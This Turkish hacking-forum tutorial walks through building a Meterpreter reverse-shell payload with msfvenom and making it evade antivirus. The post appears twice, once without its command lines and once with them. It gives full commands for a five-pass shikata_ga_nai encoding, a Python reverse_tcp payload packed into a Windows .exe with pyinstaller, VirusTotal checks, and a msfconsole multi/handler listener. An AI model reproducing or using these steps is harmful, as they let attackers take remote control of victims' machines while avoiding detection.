Merhabalar TürkHackTeam ailesi, bugün sizlerle birlikte Msfvenom Encoding yöntemi ile Payload hazırlayacağız. Konu başlıklarına bakalım ardından konumuza geçelim.
Konu Başlıkları
Msfvenom Nedir?
Encoder Nedir?
Msfvenom ile Encoding İşlemi
Pyinstaller Nedir?
Msfvenom Nedir?
Msfvenom ile payload oluşturabilir ve bu payloadların anti-virüs programlarına yakalanmaması adına Encoding yöntemini kullanabiliriz. Eskiden msfpayload ve msfencode araçları vardı fakat Msfvenom aracı ikisinin de işini yapabiliyor ve daha hızlıdır.
Encoder Nedir?
Bir programın/yazılımın anti-virüs programlarına yakalanmaması adına yapılan kriptolama işlemine denir.
Msfvenom ile Encoding İşlemi
Öncelikle Msfvenom aracımızda ki parametrelere bakalım bunun için de
diyelim.
Biz encoder özelliğini kullanacağız ve bu modüllere bir bakalım. Bunun için de
yazalım.
Burada modüllerin açıklamasını, isimlerini ve seviyelerini veriyor.
Ben x86/shikata_ga_nai encoderını kullanacağım. Encoding işlemleri genel de varsayılan olarak 1 kere yapılır. Ne kadar fazla yaparsanız anti-virüslere yakalanma ihtimali o kadar düşer fakat boyutu da o kadar artar. 4-5 idealdir. Ben 5 yapacağım. Payload'ı oluşturmak için
yazalım ve Enter'a basalım.
Virüstotal'e atalım ve ne kadar etkili bakalım ) Eveeett baya etikili Encoder'lar anti-virüsler tarafından apaçık belli oluyor artık. Bunun için farklı bir yöntem ile yapacağız.
Burada pyinstaller kullanacağız. Bunun ne olduğuna değinelim.
Pyinstaller Nedir?
Pyinstaller, .py uzantılı yani python ile yazılmış bir scripti .exe olarak dönüştürmenizi sağlar. Bu sayede anti-virüslere yakalanma olasılığınız baya bir düşer. İsterseniz deneyelim.
Yine terminale gelerek
yazalım.
Bunu Virüstotal'e atalım bakalım ne olacak.
Gördüğünüz gibi oranı gayet iyi bir şekilde düştü. Fakat bu da bariz bir şekilde virüslü olduğunu gösteriyor. Bunun için de pyinstaller'ı kullanacağız.
Terminali açarak
yazalım ve indirelim.
Şimdi msfvenom ile .py uzantılı bir payload hazırladık fakat Windows makinelerde direk çalışması için .exe olmasını isteriz. Bunun için de terimale
yazalım.
Gördüğünüz gibi nereye kaydettiğini de gösterdi bizlere.
Peki bunu Virüstotal'e atarsak ne olur?
Gayet başarılı )
Peki bunu attık da nasıl dinleyeceğiz veya nasıl işlem yapacağız derseniz bunun içinde msfconsole'a işimiz düşüyor. Terimanelde açalım
Açtıktan sonra Payload'ı dinlemek için
yazalım ardından Payload'ı tanıtalım
yazalım.
show options diyerek ayarlamıza bakalım. Burada sadece IP adresi eksik port numarası doğru bunu da ayarlamak için
yazalım.
Ardından Payload'ımızı dinlemek için
yazalım ve dinlemeye başlayalım.
Konum bu kadardı arkadaşlar, başka bir yazımda görüşmek üzere sağlıcakla...
Konu Başlıkları
Msfvenom Nedir?
Encoder Nedir?
Msfvenom ile Encoding İşlemi
Pyinstaller Nedir?
Msfvenom Nedir?
Msfvenom ile payload oluşturabilir ve bu payloadların anti-virüs programlarına yakalanmaması adına Encoding yöntemini kullanabiliriz. Eskiden msfpayload ve msfencode araçları vardı fakat Msfvenom aracı ikisinin de işini yapabiliyor ve daha hızlıdır.
Encoder Nedir?
Bir programın/yazılımın anti-virüs programlarına yakalanmaması adına yapılan kriptolama işlemine denir.
Msfvenom ile Encoding İşlemi
Öncelikle Msfvenom aracımızda ki parametrelere bakalım bunun için de
Kod:
msfvenom -l
Biz encoder özelliğini kullanacağız ve bu modüllere bir bakalım. Bunun için de
Kod:
msfvenom -l encoders
Burada modüllerin açıklamasını, isimlerini ve seviyelerini veriyor.
Ben x86/shikata_ga_nai encoderını kullanacağım. Encoding işlemleri genel de varsayılan olarak 1 kere yapılır. Ne kadar fazla yaparsanız anti-virüslere yakalanma ihtimali o kadar düşer fakat boyutu da o kadar artar. 4-5 idealdir. Ben 5 yapacağım. Payload'ı oluşturmak için
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > Nereye_Kaydetmek_İsterseniz
Virüstotal'e atalım ve ne kadar etkili bakalım ) Eveeett baya etikili Encoder'lar anti-virüsler tarafından apaçık belli oluyor artık. Bunun için farklı bir yöntem ile yapacağız.
Burada pyinstaller kullanacağız. Bunun ne olduğuna değinelim.
Pyinstaller Nedir?
Pyinstaller, .py uzantılı yani python ile yazılmış bir scripti .exe olarak dönüştürmenizi sağlar. Bu sayede anti-virüslere yakalanma olasılığınız baya bir düşer. İsterseniz deneyelim.
Yine terminale gelerek
Kod:
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 -f raw > Dosya_Yolu
Bunu Virüstotal'e atalım bakalım ne olacak.
Gördüğünüz gibi oranı gayet iyi bir şekilde düştü. Fakat bu da bariz bir şekilde virüslü olduğunu gösteriyor. Bunun için de pyinstaller'ı kullanacağız.
Terminali açarak
Kod:
sudo apt-get install pyinstaller
Şimdi msfvenom ile .py uzantılı bir payload hazırladık fakat Windows makinelerde direk çalışması için .exe olmasını isteriz. Bunun için de terimale
Kod:
pyinstaller --onefile python_dosyanız.py
Gördüğünüz gibi nereye kaydettiğini de gösterdi bizlere.
Peki bunu Virüstotal'e atarsak ne olur?
Gayet başarılı )
Peki bunu attık da nasıl dinleyeceğiz veya nasıl işlem yapacağız derseniz bunun içinde msfconsole'a işimiz düşüyor. Terimanelde açalım
Kod:
msfconsole
Açtıktan sonra Payload'ı dinlemek için
Kod:
use exploit/multi/handler
Kod:
set PAYLOAD python/meterpreter/reverse_tcp
show options diyerek ayarlamıza bakalım. Burada sadece IP adresi eksik port numarası doğru bunu da ayarlamak için
Kod:
set LHOST IP_adresiniz
Ardından Payload'ımızı dinlemek için
Kod:
exploit
Konum bu kadardı arkadaşlar, başka bir yazımda görüşmek üzere sağlıcakla...
Son düzenleme: